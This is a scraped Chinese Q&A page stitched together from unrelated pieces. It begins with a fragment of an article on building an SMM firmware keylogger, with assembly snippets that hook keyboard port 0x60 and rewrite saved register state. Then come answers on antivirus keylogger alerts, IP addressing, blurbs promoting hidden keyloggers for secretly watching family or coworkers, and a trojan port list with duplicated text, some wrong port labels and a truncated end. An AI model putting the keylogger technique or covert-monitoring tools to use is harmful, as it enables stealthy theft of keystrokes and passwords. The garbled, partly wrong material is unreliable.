I/O 端口(bits [16:31]),包含了当前访问的I/O端口号。 如果当前是通过IN DX指令,字节宽度来访问0x60端口, IO_SMI置位,SMM keylogger首先需要检测和更新SMM存储状态映射区中的EAX域,然后还要检测0x7FA4处的I/O状态域的值是否为0x00600013。 mov esi, SMBASE mov ecx, dword ptr fs:[esi + 0xFFA4] cmp ecx, 0x00600013 jnz _not_io_smi 上述是检测的简化形式,SMM keylogger还需要检测I/O状态域中I/OType和I/O Length等其他标志。因为我们是记录键盘的目的,所以只关心I/O陷阱,并不用理会I/O重启(I/O Restart)的相关设置。I/O重启和I/O陷阱构成了完整的SMI I/O处理方式,当SMM中的SMI执行完毕时,I/O重启允许IN或OUT指令从SMI中断处恢复并继续执行。 I/O陷阱机制允许我们在任意I/O端口的软硬件交互读写操作时陷入SMI的处理例程,现在关心的只是0x60数据端口,实现键盘击键时的I/O陷入的具体步骤如下: 1. 击键事件发生时,键盘控制器产生一个硬件中断,用I/O APIC将IRQ 1中断信号导向SMI的处理句柄。 2. 收到键盘中断之后,APIC调用IDT中的键盘中断处理程序,对PS/2键盘是0x93号中断向量。 3. 键盘中断处理程序通过端口0x60从键盘控制器的缓冲区中读取按键扫描码。正常情况下将清空扫描码,并将其显示在屏幕上。 4. 此时芯片组引起端口0x60的读取陷阱,产生信号通知I/O陷阱SMI。 5. 在SMM模式下,keylogger的SMI处理句柄响应SMI中断,处理I/O陷阱SMI。 6. 退出SMM时,keylogger的SMI处理句柄将结果(当前扫描码)返回给0x60端口的读取指令,交由内核的中断句柄作进一步处理。 上述的第6步操作,将扫描码返回到OS的键盘中断处理程序,在I/O陷阱和I/O APIC下的实现是有区别的。如果使用了APIC来触发SMI,SMI keylogger必须再次向键盘控制器的缓冲区中填充扫描码,以待操作系统再次读取,做进一步处理。 I/O陷阱下则是采用另外的方法。OS键盘中断处理程序使用的“IN al, 0x60”指令会引起SMM keylogger的I/O陷入,由于该IN指令产生了无穷的SMI陷入循环,将永远无法从SMM中恢复到原来的状态继续执行。此时,SMI句柄只要将IN指令的读取结果保存到AL/AX/EAX寄存器,表现得就像IN指令从来没有陷入过一样。 IA32体系,EAX寄存器位于SMRAM存储状态区偏移为0x7FD0的位置,即 SMBASE +0x8000+0x7FD0,在IA64下为SMBASE + 0x8000+0x7F5C。因此当上述的IO_SMI置位时,SMM keylogger需要将从0x60端口读取的扫描码更新至EAX域,下面就是更新EAX域的代码片段: ; 1.验证读取0x60端口时设置的IO_SMI位 ; 2.更新SMM存储状态区的EAX域(SMBASE + 0x8000 + 0x7FD0) mov esi, SMBASE mov ecx, dword ptr fs:[esi + 0xFFA4] cmp ecx, 0x00600013 jnz _not_io_smi mov byte ptr fs:[esi + 0xFFD0], al 3.5 多处理器下的keylogger说明 我们的keylogger已经更新了系统SMRAM存储状态映射区中的EAX(RAX)寄存器,要是碰到了多处理器系统那又该怎么办呢?当多个逻辑处理器同时进入SMM模式时,它们在SMRAM中都要有自己的SMM存储状态映射区,这将由BIOS为每个处理器分配不同的SMRAM 基地址(SMBASE)来妥善解决,因此该项技术也被称为“SMBASE重定向”。 例如在双处理器系统中,两个逻辑处理器分别具有不同的SMBASE,SMBASE0和SMBASE0+0x300;第一个处理器的SMI处理句柄将从EIP = SMBASE0+0x8000处开始执行,而第二个则从EIP = SMBASE0+0x8000+0x300的地方开始;同理,它们各自的存储状态映射区也就分别位于(SMBASE0+0x8000+0x7F00)和(SMBASE0+0x8000+0x7F00+0x300)。 不只是0x300,BIOS也会为额外的处理器设置其他的SMBASE增量偏移。增量偏移虽然可变,但是其计算过程也不算复杂。在SMM存储状态映射区内部0x7EFC偏移处包含了一个SMM修正ID(Revision ID),对每个处理器来说都是同样的数值。例如SMM的修正ID可能为0x30100,在SMRAM中找到各处理器的修正ID,计算它们之间的差值也就得到了各SMBASE间的相对位移。 下面我们展示的是SMM keylogger在双处理器系统上的EAX更新代码。它将顺次检查I/O状态域是否和某个处理器的I/O陷阱匹配,确定的话则更新其SMM存储状态映射区中的EAX值。 ; 在双处理器系统上更新EAX mov esi, SMBASE lea ecx, dword ptr [esi + SMM_MAP_IO_STATE_INFO] cmp ecx, IOSMI_IN_60_BYTE jne _skip_proc0: mov byte ptr [esi + SMM_MAP_EAX], al _skip_proc0: lea ecx, dword ptr [esi + SMM_MAP_IO_STATE_INFO + 0x300] cmp ecx, IOSMI_IN_60_BYTE jne _skip_proc1: mov byte ptr [esi + SMM_MAP_EAX + 0x300], al _skip_proc1: … 4 建议的检测方法 4.1 I/O陷阱机制检测 4.2 计时(timing)检测
2023-07-15 09:14:231

卡巴老是提示 e:《完美世界》国际版elementelementclient.exe 未终止: keylogg

没关系的,如果你觉得比较烦,设置一下卡巴就行了。况且我一直也在用,用了好几年了.我学习的电脑都用这个呢?
2023-07-15 09:14:314

回车站咋也会中毒

用咔吧斯基在安全模式下扫描,肯定病毒全部清楚.(超级兔子,360卫士)都要在安全模式下运行才行的.
2023-07-15 09:14:383

什么是木马?

我简单的说把木马病毒起源与特洛伊战争。它表面是什么好东西贺卡这种东西,其实是一种偷窥你密码隐私的东西。防范办法很简单:每天电脑扫描,不接受陌生文件。希望对你有帮助!!
2023-07-15 09:14:473

IP 地址 与端口都代表什么有人知道吗?

1.IP地址基础知识。  在Internet上有千百万台主机,为了区分这些主机,人们给每台主机都分配了一个专门的地址,称为IP地址。通过IP地址就可以访问到每一台主机。IP地址由4部分数字组成,每部分数字对应于8位二进制数字,各部分之间用小数点分开。如某一台主机的IP地址为:211.152.65.112 ,Internet IP地址由NIC(Internet Network Information Center)统一负责全球地址的规划、管理;同时由Inter NIC、APNIC、RIPE三大网络信息中心具体负责美国及其它地区的IP地址分配。   固定IP:固定IP地址是长期固定分配给一台计算机使用的IP地址,一般是特殊的服务器才拥有固定IP地址。  动态IP:因为IP地址资源非常短缺,通过电话拨号上网或普通宽带上网用户一般不具备固定IP地址,而是由ISP动态分配暂时的一个IP地址。普通人一般不需要去了解动态IP地址,这些都是计算机系统自动完成的。  公有地址(Public address)由Inter NIC(Internet Network Information Center 因特网信息中心)负责。这些IP地址分配给注册并向Inter NIC提出申请的组织机构。通过它直接访问因特网。   私有地址(Private address)属于非注册地址,专门为组织机构内部使用。   以下列出留用的内部私有地址   A类 10.0.0.0--10.255.255.255   B类 172.16.0.0--172.31.255.255   C类 192.168.0.0--192.168.255.2552.IP地址是由什么机构分配的?  所有的IP地址都由国际组织NIC(Network Information Center)负责统一分配,目前全世界共有三个这样的网络信息中心。   InterNIC:负责美国及其他地区;    ENIC:负责欧洲地区;    APNIC:负责亚太地区。   我国申请IP地址要通过APNIC,APNIC的总部设在日本东京大学。申请时要考虑申请哪一类的IP地址,然后向国内的代理机构提出。3.什么是公有地址和私有地址?  公有地址(Public address)由Inter NIC(Internet Network Information Center 因特网信息中心)负责。这些IP地址分配给注册并向Inter NIC提出申请的组织机构。通过它直接访问因特网。   私有地址(Private address)属于非注册地址,专门为组织机构内部使用。   以下列出留用的内部私有地址   A类 10.0.0.0--10.255.255.255   B类 172.16.0.0--172.31.255.255   C类 192.168.0.0--192.168.255.255 4.为什么会受到网络攻击?  据中国公安部消息,公安部2004年全国信息网络安全状况暨计算机病毒疫情调查活动圆满结束,调查表明,中国计算机用户计算机病毒的感染率为87.9%,比去年增加了2%。  调查表明,中国计算机用户计算机病毒的感染率为87.9%,比去年增加了2%。但是,3次以上感染计算机病毒的用户数量有较大回落,占全部感染用户数量的57.1%,比去年减少了26%,表明受过病毒感染用户的防范能力有所提高。  2003年5月至2004年5月,中国感染率最高的计算机病毒是网络蠕虫病毒和针对浏览器的病毒或者恶意代码,如“震荡波”、“网络天空”、“尼姆达”、“SQL蠕虫”等。计算机病毒造成的破坏和损失情况比往年有所下降,但针对网络的破坏呈明显上升趋势,特别是一些盗取计算机用户帐号、密码等敏感信息的计算机病毒隐蔽性强、危害性大。  调查表明,被调查单位发生网络安全事件比例为58%。其中,发生1次的占总数的22%,2次的占13%,3次以上的占23%。发生网络安全事件中,计算机病毒、蠕虫和木马程序造成的安全事件占发生安全事件单位总数的79%,拒绝服务、端口扫描和篡改网页等网络攻击事件占43%,大规模垃圾邮件传播造成的安全事件占36%。54%的被调查单位网络安全事件造成的损失比较轻微,损失严重和非常严重的占发生安全事件单位总数的10%。  造成网络安全事件的主要原因是安全管理制度不落实和安全防范意识薄弱,其中因未修补、防范软件漏洞等原因造成的安全事件占总数的66%。同时,调查表明信息网络使用单位对安全管理工作的重视程度、落实安全管理措施和采用安全专用技术产品等方面均有所提高和加强,但是用户安全观念薄弱、安全管理人员缺乏培训,以及缺乏有效的安全信息通报渠道、安全服务行业发展不能满足社会需要等问题仍然比较突出。  造成网络安全事件的主要原因是安全管理制度不落实和安全防范意识薄弱,其中因未修补、防范软件漏洞等原因造成的安全事件占总数的66%。同时,调查表明信息网络使用单位对安全管理工作的重视程度、落实安全管理措施和采用安全专用技术产品等方面均有所提高和加强,但是用户安全观念薄弱、安全管理人员缺乏培训,以及缺乏有效的安全信息通报渠道、安全服务行业发展不能满足社会需要等问题仍然比较突出。 5.个人用户如何拦截网络攻击?·黑客攻击行为特征分析 反攻击技术综合性分析报告
2023-07-15 09:15:101

求能监控Win7键盘输入的软件

英文版的keylogger
2023-07-15 09:15:244

键盘记录器活动 D:PROGRAM FILES新破天一剑CHINA_LOGIN.MPR 检测到威胁: Keylogger

删除不了,你可以粉碎这个文件啊,也可以把新破天一剑删除了 重新安装
2023-07-15 09:15:494

急急急,电脑检测到威胁,非常危险,怎么办啊,删不掉啊,也粉碎不了,也隔离不了,烦死了

重启进入安全模式杀毒 不行就重装系统没 别的方法 如果你有杀毒软件光盘的话呢 就关盘启动杀毒就好
2023-07-15 09:15:582

有什么软件可以监控是否有人动过我的电脑?

你这种情况推荐使用pcLog-电脑日志 V5.30文件大小:925KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★你的同事和家人在你的机器上作了什么?他们是不是使用了你的工作帐号或者玩游戏;你的孩子趁家长不在是不是浏览了一些不应该去的网站;你负责的局域网中的用户是不是没有工作,而是在玩游戏。这些事情你可能都一无所知,pcLog软件能够确切的告诉你:他们已经做的和正在做的一切事情!pcLog能记录输入的汉字和鼠标、键盘(包括小键盘)的动作,还能记录互联网浏览地址,可以定时、定项的记录,并能通过局域网或广域网随时对目标机器查阅历史记录和用户屏幕,或者通过互联网发送历史记录文件,并可以对记录进行保存和管理。还能够对服务端程序进行卸载、更名、停止运行和自动升级等控制,非常适合家长、老板管理自己的机器和网络管理员管...软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Keyboard Spectator Pro V3.32软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Family Keylogger V2.80Family Keylogger 是个计算机监控软件,它能以详细的 Log 文本文件将其它使用者的档案执行纪录条列纪录下来,只要调整模式为隐藏模式即开始纪录,软件的隐藏性佳,能消失于操作系统中的所有选单或安装纪录,让他人无法察觉此软件的存在。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Auto Keylogger V5.2通过记录下你键盘的敲击,从而可以监测到你的会话,密码以及网上活动等。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Windows超级监视 V3.0文件大小:171KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★1.你是否遇到这种情况,当别人用你的电脑时,你希望知道他在你的电脑上作了什么动作,删除了什么文件!2.你是否遇到这种情况,有时一些软件在安装的时候,莫名的往硬盘里写了一些东西!你是不是想知道呢?3.如果不小心忘记了CMOS的密码,应该怎么办?4.如果不小心忘记了屏幕保护的密码,应该怎么办?5.想查看Windows中的***,而又不想动鼠标,应该怎么办?6.想查看Windows的进程?7.想查看CPU的使用情况?8.想查看内存中运行的软件?9.希望通过软件调用常用的工具!10.可以把软件监视的结果保存为文本文档!11.可以设置为软件自启动,而且自启动时隐藏!现在超级监视可以为你解决这个问题...软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版pcLog-电脑日志 V5.30文件大小:925KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★你的同事和家人在你的机器上作了什么?他们是不是使用了你的工作帐号或者玩游戏;你的孩子趁家长不在是不是浏览了一些不应该去的网站;你负责的局域网中的用户是不是没有工作,而是在玩游戏。这些事情你可能都一无所知,pcLog软件能够确切的告诉你:他们已经做的和正在做的一切事情!pcLog能记录输入的汉字和鼠标、键盘(包括小键盘)的动作,还能记录互联网浏览地址,可以定时、定项的记录,并能通过局域网或广域网随时对目标机器查阅历史记录和用户屏幕,或者通过互联网发送历史记录文件,并可以对记录进行保存和管理。还能够对服务端程序进行卸载、更名、停止运行和自动升级等控制,非常适合家长、老板管理自己的机器和网络管理员管...软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版中天卫士 V3.52 单机版文件大小:12,233KB 更新时间: 2004-10-9 下载次数:50次 软件星级:★★★中天卫士是一款功能强大的电脑监控管理软件。与众多监控软件不同,中天卫士不是紧紧监控浏览器或网址,而是监控所有的电脑操作和应用程序,并记录电脑操作和运行情况。中天卫士采用关键字检测技术,无需一个不停更新的庞大的监测库或网址库。中天卫士是电脑和网络安全、健康使用的保证,适用于学校、家庭、企业、机房、网吧、公用电脑等。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Desktop Surveillance Personal V6.0.3文件大小:2,676KB 更新时间: 2004-10-9 下载次数:49次 软件星级:★★★当你不在的时候,总是觉得计算机好象被别人动过。这个软件能够帮上你的忙。当你不在时,它能够监视你计算机的一切活动,包括浏览网页、e-mail、聊天室等等。它会在幕后纪录键盘活动以及撷取屏幕内容,同时它还会作成一份关于所有使用者的详细报告,包括网站、聊天室、新闻群组、游戏、档案,你可以在你回来之后看这份报告或是让他马上把报告从e-mail或是ftp传给你。
2023-07-15 09:16:111

谁告诉我0到1023端口提供的是什么的系统服务吗??

我们常常会在各类的技术文章中见到诸如135、137、139、443之类的“端口”,可是这些端口究竟有什么用呢?它会不会给我们的计算机带来潜在的威胁呢?究竟有多少端口是有用的?想要了解的话,就跟我来吧:D 端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。 端口:19 服务:Character Generator 端口:5742 服务:[NULL] 说明:木马WinCrash1.03开放此端口。 端口:6267 服务:[NULL] 说明:木马广外女生开放此端口。 端口:6400 服务:[NULL] 说明:木马The tHing开放此端口。 端口:6670、6671 服务:[NULL] 说明:木马Deep Throat开放6670端口。而Deep Throat 3.0开放6671端口。 端口:6883 服务:[NULL] 说明:木马DeltaSource开放此端口。 端口:6969 服务:[NULL] 说明:木马Gatecrasher、Priority开放此端口。 端口:6970 服务:RealAudio 说明:RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP-7070端口外向控制连接设置的。 端口:7000 服务:[NULL] 说明:木马Remote Grab开放此端口。 端口:7300、7301、7306、7307、7308 服务:[NULL] 说明:木马NetMonitor开放此端口。另外NetSpy1.0也开放7306端口。 端口:7323 服务:[NULL] 说明:Sygate服务器端。 端口:7626 服务:[NULL] 说明:木马Giscier开放此端口。 端口:7789 服务:[NULL] 说明:木马ICKiller开放此端口。 端口:8000 服务:OICQ 说明:腾讯QQ服务器端开放此端口。 " 端口:8010 服务:Wingate 说明:Wingate代理开放此端口。 端口:8080 服务:代理端口 说明:WWW代理开放此端口。 端口:9400、9401、9402 服务:[NULL] 说明:木马Incommand 1.0开放此端口。 端口:9872、9873、9874、9875、10067、10167 服务:[NULL] 说明:木马Portal of Doom开放此端口 端口:9989 服务:[NULL] 说明:木马iNi-Killer开放此端口。 端口:11000 服务:[NULL] 说明:木马SennaSpy开放此端口。 端口:11223 服务:[NULL] 说明:木马Progenic trojan开放此端口。 端口:12076、61466 服务:[NULL] 说明:木马Telecommando开放此端口。 端口:12223 服务:[NULL] 说明:木马Hack"99 KeyLogger开放此端口。 端口:12345、12346 服务:[NULL] 说明:木马NetBus1.60/1.70、GabanBus开放此端口。 端口:12361 服务:[NULL] 说明:木马Whack-a-mole开放此端口。 端口:13223 服务:PowWow 说明:PowWow是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有攻击性。它会驻扎在这个TCP端口等回应。造成类似心跳间隔的连接请求。如果一个拨号用户从另一个聊天者手中继承了IP地址就会发生好象有很多不同的人在测试这个端口的情况。这一协议使用OPNG作为其连接请求的前4个字节。 端口:16969 服务:[NULL] 说明:木马Priority开放此端口。 端口:17027 服务:Conducent 说明:这是一个外向连接。这是由于公司内部有人安装了带有Conducent"adbot"的共享软件。Conducent"adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。 端口:19191 服务:[NULL] 说明:木马蓝色火焰开放此端口。 端口:20000、20001 服务:[NULL] 说明:木马Millennium开放此端口。 端口:20034 服务:[NULL] 说明:木马NetBus Pro开放此端口。 端口:21554 服务:[NULL] 说明:木马GirlFriend开放此端口。 端口:22222 服务:[NULL] 说明:木马Prosiak开放此端口。 端口:23456 服务:[NULL] 说明:木马Evil FTP、Ugly FTP开放此端口。 端口:26274、47262 服务:[NULL] 说明:木马Delta开放此端口。 端口:27374 服务:[NULL] 说明:木马Subseven 2.1开放此端口。 端口:30100 服务:[NULL] 说明:木马NetSphere开放此端口。 端口:30303 服务:[NULL] 说明:木马Socket23开放此端口。 端口:30999 服务:[NULL] 说明:木马Kuang开放此端口。 端口:31337、31338 服务:[NULL] 说明:木马BO(Back Orifice)开放此端口。另外木马DeepBO也开放31338端口。 端口:31339 服务:[NULL] 说明:木马NetSpy DK开放此端口。 端口:31666 服务:[NULL] 说明:木马BOWhack开放此端口。 端口:33333 服务:[NULL] 说明:木马Prosiak开放此端口。 端口:34324 服务:[NULL] 说明:木马Tiny Telnet Server、BigGluck、TN开放此端口。 端口:40412 服务:[NULL] 说明:木马The Spy开放此端口。 端口:40421、40422、40423、40426、 服务:[NULL] 说明:木马Masters Paradise开放此端口。 端口:43210、54321 服务:[NULL] 说明:木马SchoolBus 1.0/2.0开放此端口。 端口:44445 服务:[NULL] 说明:木马Happypig开放此端口。 端口:50766 服务:[NULL] 说明:木马Fore开放此端口。 端口:53001 服务:[NULL] 说明:木马Remote Windows Shutdown开放此端口。 端口:65000 服务:[NULL] 说明:木马Devil 1.03开放此端口。 端口:88 说明:Kerberos krb5。另外TCP的88端口也是这个用途。 端口:137 说明:SQL Named Pipes encryption over other protocols name lookup(其他协议名称查找上的SQL命名管道加密技术)和SQL RPC encryption over other protocols name lookup(其他协议名称查找上的SQL RPC加密技术)和Wins NetBT name service(WINS NetBT名称服务)和Wins Proxy都用这个端口。 端口:161 说明:Simple Network Management Protocol(SMTP)(简单网络管理协议) 端口:162 说明:SNMP Trap(SNMP陷阱) 端口:445 说明:Common Internet File System(CIFS)(公共Internet文件系统) 端口:464 说明:Kerberos kpasswd(v5)。另外TCP的464端口也是这个用途。 端口:500 说明:Internet Key Exchange(IKE)(Internet密钥交换) 端口:1645、1812 说明:Remot Authentication Dial-In User Service(RADIUS)authentication(Routing and Remote Access)(远程认证拨号用户服务) 端口:1646、1813 说明:RADIUS accounting(Routing and Remote Access)(RADIUS记帐(路由和远程访问)) 端口:1701 说明:Layer Two Tunneling Protocol(L2TP)(第2层隧道协议) 端口:1801、3527 说明:Microsoft Message Queue Server(Microsoft消息队列服务器)。还有TCP的135、1801、2101、2103、2105也是同样的用途。 端口:2504 说明:Network Load Balancing(网络平衡负荷) 0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口 连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。 端口:21 服务:FTP 说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。 端口:22 服务:Ssh 说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。 端口:23 服务:Telnet 说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。 端口:25 服务:SMTP 说明:SMTP服务器所开放的端口,用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭,他们需要连接到高带宽的E-MAIL服务器上,将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。 端口:31 服务:MSG Authentication 说明:木马Master Paradise、Hackers Paradise开放此端口。 端口:42 服务:WINS Replication 说明:WINS复制 端口:53 服务:Domain Name Server(DNS) 说明:DNS服务器所开放的端口,入侵者可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其他的通信。因此防火墙常常过滤或记录此端口。 端口:67 服务:Bootstrap Protocol Server 说明:通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们,分配一个地址把自己作为局部路由器而发起大量中间人(man-in-middle)攻击。客户端向68端口广播请求配置,服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。 端口:69 服务:Trival File Transfer 说明:许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。 端口:79 服务:Finger Server 说明:入侵者用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其他机器Finger扫描。 端口:80 服务:HTTP 说明:用于网页浏览。木马Executor开放此端口。 端口:99 服务:Metagram Relay 说明:后门程序ncx99开放此端口。 端口:102 服务:Message transfer agent(MTA)-X.400 over TCP/IP 说明:消息传输代理。 端口:109 服务:Post Office Protocol -Version3 说明:POP3服务器开放此端口,用于接收邮件,客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个,这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。 端口:110 服务:SUN公司的RPC服务所有端口 说明:常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等 端口:113 服务:Authentication Service 说明:这是一个许多计算机上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器,尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,将会看到许多这个端口的连接请求。记住,如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。 端口:119 服务:Network News Transfer Protocol 说明:NEWS新闻组传输协议,承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制,只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送SPAM。 端口:135 服务:Location Service 说明:Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时,它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗?什么版本?还有些DOS攻击直接针对这个端口。 端口:137、138、139 服务:NETBIOS Name Service 说明:其中137、138是UDP端口,当通过网上邻居传输文件时用这个端口。而139端口:通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。 端口:143 服务:Interim Mail Access Protocol v2 说明:和POP3的安全问题一样,许多IMAP服务器存在有缓冲区溢出漏洞。记住:一种LINUX蠕虫(admv0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后,这些漏洞变的很流行。这一端口还被用于IMAP2,但并不流行。 端口:161 服务:SNMP 说明:SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中,通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。 端口:177 服务:X Display Manager Control Protocol 说明:许多入侵者通过它访问X-windows操作台,它同时需要打开6000端口。 端口:389 服务:LDAP、ILS 说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。 端口:443 服务:Https 说明:网页浏览端口,能提供加密和通过安全端口传输的另一种HTTP。 端口:456 服务:[NULL] 说明:木马HACKERS PARADISE开放此端口。 端口:513 服务:Login,remote login 说明:是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。 端口:544 服务:[NULL] 说明:kerberos kshell 端口:548 服务:Macintosh,File Services(AFP/IP) 说明:Macintosh,文件服务。 端口:553 服务:CORBA IIOP (UDP) 说明:使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。 端口:555 服务:DSF 说明:木马PhAse1.0、Stealth Spy、IniKiller开放此端口。 端口:568 服务:Membership DPA 说明:成员资格 DPA。 端口:569 服务:Membership MSN 说明:成员资格 MSN。 端口:635 服务:mountd 说明:Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的,但是基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住mountd可运行于任何端口(到底是哪个端口,需要在端口111做portmap查询),只是Linux默认端口是635,就像NFS通常运行于2049端口。 端口:636 服务:LDAP 说明:SSL(Secure Sockets layer) 端口:666 服务:Doom Id Software 说明:木马Attack FTP、Satanz Backdoor开放此端口 端口:993 服务:IMAP 说明:SSL(Secure Sockets layer) 端口:1001、1011 服务:[NULL] 说明:木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。 端口:1024 服务:Reserved 说明:它是动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器,打开Telnet,再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。 端口:1025、1033 服务:1025:network blackjack 1033:[NULL] 说明:木马netspy开放这2个端口。 端口:1080 服务:SOCKS 说明:这一协议以通道方式穿过防火墙,允许防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置,它会允许位于防火墙外部的攻击穿过防火墙。WinGate常会发生这种错误,在加入IRC聊天室时常会看到这种情况。 端口:1170 服务:[NULL] 说明:木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。 端口:1234、1243、6711、6776 服务:[NULL] 说明:木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。 端口:1245 服务:[NULL] 说明:木马Vodoo开放此端口。 端口:1433 服务:SQL 说明:Microsoft的SQL服务开放的端口。 端口:1492 服务:stone-design-1 说明:木马FTP99CMP开放此端口。 端口:1500 服务:RPC client fixed port session queries 说明:RPC客户固定端口会话查询 端口:1503 服务:NetMeeting T.120 说明:NetMeeting T.120 端口:1524 服务:ingress 说明:许多攻击脚本将安装一个后门SHELL于这个端口,尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图,很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口,看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。 端口:1600 服务:issd 说明:木马Shivka-Burka开放此端口。 端口:1720 服务:NetMeeting 说明:NetMeeting H.233 call Setup。 端口:1731 服务:NetMeeting Audio Call Control 说明:NetMeeting音频调用控制。 端口:1807 服务:[NULL] 说明:木马SpySender开放此端口。 端口:1981 服务:[NULL] 说明:木马ShockRave开放此端口。 端口:1999 服务:cisco identification port 说明:木马BackDoor开放此端口。 端口:2000 服务:[NULL] 说明:木马GirlFriend 1.3、Millenium 1.0开放此端口。 端口:2001 服务:[NULL] 说明:木马Millenium 1.0、Trojan Cow开放此端口。 端口:2023 服务:xinuexpansion 4 说明:木马Pass Ripper开放此端口。 端口:2049 服务:NFS 说明:NFS程序常运行于这个端口。通常需要访问Portmapper查询这个服务运行于哪个端口。 端口:2115 服务:[NULL] 说明:木马Bugs开放此端口。 端口:2140、3150 服务:[NULL] 说明:木马Deep Throat 1.0/3.0开放此端口。 端口:2500 